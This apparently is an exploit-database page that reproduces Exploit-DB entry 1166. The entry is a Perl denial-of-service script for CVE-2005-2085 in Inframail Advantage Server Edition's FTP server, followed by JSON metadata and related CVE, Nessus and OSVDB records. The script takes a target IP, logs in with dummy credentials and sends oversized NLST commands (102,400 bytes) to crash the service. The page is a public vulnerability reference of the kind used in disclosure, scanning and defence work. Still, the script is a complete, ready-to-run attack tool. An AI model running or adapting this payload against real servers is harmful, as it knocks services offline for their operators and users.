Search...

Inframail Advantage Server Edition 6.0 <= 6.37 - FTP BoF Exploit

2005-06-27T00:00:00

ID EDB-ID:1166
Type exploitdb
Reporter Reed Arvin
Modified 2005-06-27T00:00:00

Description

Inframail Advantage Server Edition 6.0. CVE-2005-2085. Dos exploit for windows platform

                                        
                                            #===== Start Inframail_FTPOverflow.pl =====
#
# Usage: Inframail_FTPOverflow.pl &lt;ip&gt;
#        Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET-&gt;new(PeerAddr =&gt; $ARGV[0],
                                    PeerPort =&gt; "21",
                                    Proto    =&gt; "TCP"))
{
        print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

        sleep(1);

        print $socket "USER hello\r\n";

        sleep(1);

        print $socket "PASS moto\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:21\n";
}
#===== End Inframail_FTPOverflow.pl =====

# milw0rm.com [2005-06-27]

JSON Vulners Source

Initial Source

{"hash": "9265f0aa450f79d63a7eed86b25a5f237da3d221271480bb7a8467049a0e9936", "id": "EDB-ID:1166", "lastseen": "2016-01-31T13:40:48", "viewCount": 5, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/1166/", "description": "Inframail Advantage Server Edition 6.0. CVE-2005-2085. Dos exploit for windows platform", "title": "Inframail Advantage Server Edition 6.0 <= 6.37 - FTP BoF Exploit", "sourceData": "#===== Start Inframail_FTPOverflow.pl =====\r\n#\r\n# Usage: Inframail_FTPOverflow.pl <ip>\r\n# Inframail_FTPOverflow.pl 127.0.0.1\r\n#\r\n# Infradig Systems Inframail Advantage Server Edition 6.0\r\n# (Version: 6.37)\r\n#\r\n# Download:\r\n# http://www.infradig.com/\r\n#\r\n#########################################################\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\nmy($socket) = \"\";\r\n\r\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => \"21\",\r\n Proto => \"TCP\"))\r\n{\r\n print \"Attempting to kill Inframail FTP server at $ARGV[0]:21...\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"USER hello\\r\\n\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"PASS moto\\r\\n\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"NLST \" . \"A\" x 102400 . \"\\r\\n\";\r\n\r\n sleep(1);\r\n\r\n print $socket \"NLST \" . \"A\" x 102400 . \"\\r\\n\";\r\n\r\n close($socket);\r\n}\r\nelse\r\n{\r\n print \"Cannot connect to $ARGV[0]:21\\n\";\r\n}\r\n#===== End Inframail_FTPOverflow.pl =====\r\n\r\n# milw0rm.com [2005-06-27]\r\n", "objectVersion": "1.0", "cvelist": ["CVE-2005-2085"], "published": "2005-06-27T00:00:00", "osvdbidlist": ["17608"], "references": [], "reporter": "Reed Arvin", "modified": "2005-06-27T00:00:00", "href": "https://www.exploit-db.com/exploits/1166/"}

{"result": {"cve": [{"id": "CVE-2005-2085", "type": "cve", "title": "CVE-2005-2085", "description": "Buffer overflow in Inframail Advantage Server Edition 6.0 through 6.7 allows remote attackers to cause a denial of service (process crash) via a long (1) SMTP FROM field or possibly (2) FTP NLST command.", "published": "2005-07-05T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2085", "cvelist": ["CVE-2005-2085"], "lastseen": "2017-04-18T15:51:16"}], "nessus": [{"id": "INFRAMAIL_AS_FTP_OVERFLOW.NASL", "type": "nessus", "title": "Inframail FTP Server NLST Command Remote Overflow", "description": "The remote host is running the FTP server component of Inframail, a commercial suite of network servers from Infradig Systems. \n\nAccording to its banner, the installed version of Inframail suffers from a buffer overflow vulnerability that arises when the FTP server component processes an NLST command with an excessively long argument (around 102400 bytes). Successful exploitation will cause the service to crash and may allow arbitrary code execution.", "published": "2005-06-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18587", "cvelist": ["CVE-2005-2085"], "lastseen": "2018-07-13T10:25:39"}, {"id": "INFRAMAIL_AS_SMTP_OVERFLOW.NASL", "type": "nessus", "title": "Inframail SMTP MAIL FROM Command Remote Overflow DoS", "description": "The remote host is running the SMTP server component of Inframail, a commercial suite of network servers from Infradig Systems. \n\nAccording to its banner, the installed version of Inframail suffers from a buffer overflow vulnerability that arises when the SMTP server component processes a MAIL FROM command with an excessively long argument (around 40960 bytes). Successful exploitation will cause the service to crash and may allow arbitrary code execution.", "published": "2005-06-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18588", "cvelist": ["CVE-2005-2085"], "lastseen": "2018-07-13T10:23:51"}], "exploitdb": [{"id": "EDB-ID:1165", "type": "exploitdb", "title": "Inframail Advantage Server Edition 6.0 <= 6.37 - SMTP BoF Exploit", "description": "Inframail Advantage Server Edition 6.0. CVE-2005-2085. Dos exploit for windows platform", "published": "2005-06-27T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1165/", "cvelist": ["CVE-2005-2085"], "lastseen": "2016-01-31T13:40:39"}], "osvdb": [{"id": "OSVDB:17607", "type": "osvdb", "title": "Inframail SMTP MAIL FROM Command Remote Overflow DoS", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.infradig.com/\n[Secunia Advisory ID:15828](https://secuniaresearch.flexerasoftware.com/advisories/15828/)\n[Related OSVDB ID: 17608](https://vulners.com/osvdb/OSVDB:17608)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0348.html\n[CVE-2005-2085](https://vulners.com/cve/CVE-2005-2085)\n", "published": "2005-06-27T04:10:07", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17607", "cvelist": ["CVE-2005-2085"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17608", "type": "osvdb", "title": "Inframail FTP NLST Command Remote Overflow DoS", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.infradig.com/\n[Secunia Advisory ID:15828](https://secuniaresearch.flexerasoftware.com/advisories/15828/)\n[Related OSVDB ID: 17607](https://vulners.com/osvdb/OSVDB:17607)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0348.html\n[CVE-2005-2085](https://vulners.com/cve/CVE-2005-2085)\n", "published": "2005-06-27T04:10:07", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17608", "cvelist": ["CVE-2005-2085"], "lastseen": "2017-04-28T13:20:13"}]}}

Inframail Advantage Server Edition 6.0 &lt;= 6.37 - FTP BoF Exploit

Description

Inframail Advantage Server Edition 6.0. CVE-2005-2085. Dos exploit for windows platform

Inframail Advantage Server Edition 6.0 <= 6.37 - FTP BoF Exploit